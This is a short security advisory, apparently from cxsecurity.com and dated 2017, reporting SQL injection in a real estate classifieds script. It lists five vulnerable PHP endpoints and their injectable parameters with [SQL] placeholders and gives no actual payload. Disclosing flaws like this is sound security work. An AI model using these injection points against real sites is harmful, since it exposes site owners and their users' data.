Real Estate Classifieds SQL Injection

Published
Credit
Risk
2017.06.13
EziBilisim
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

# # # # #
# Exploit Title: Real Estate Classifieds Script - SQL Injection
# Dork: N/A
# Date: 12.06.2017
# Vendor : http://www.easyrealestatescript.com/
# Software: http://www.easyrealestatescript.com/demo.html
# Demo: http://www.easyrealestatescript.com/demo.html
# Version: N/A
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection :
# http://localhost/[PATH]/site_search.php?s_purpose=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_title.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_prev.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_next.php?listing=&xmonth=[SQL]&xyear=[SQL]
# http://localhost/[PATH]/seller_listing_info_calendar_big.php?listing=&xmonth=[SQL]&xyear=[SQL]
# # # # #


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com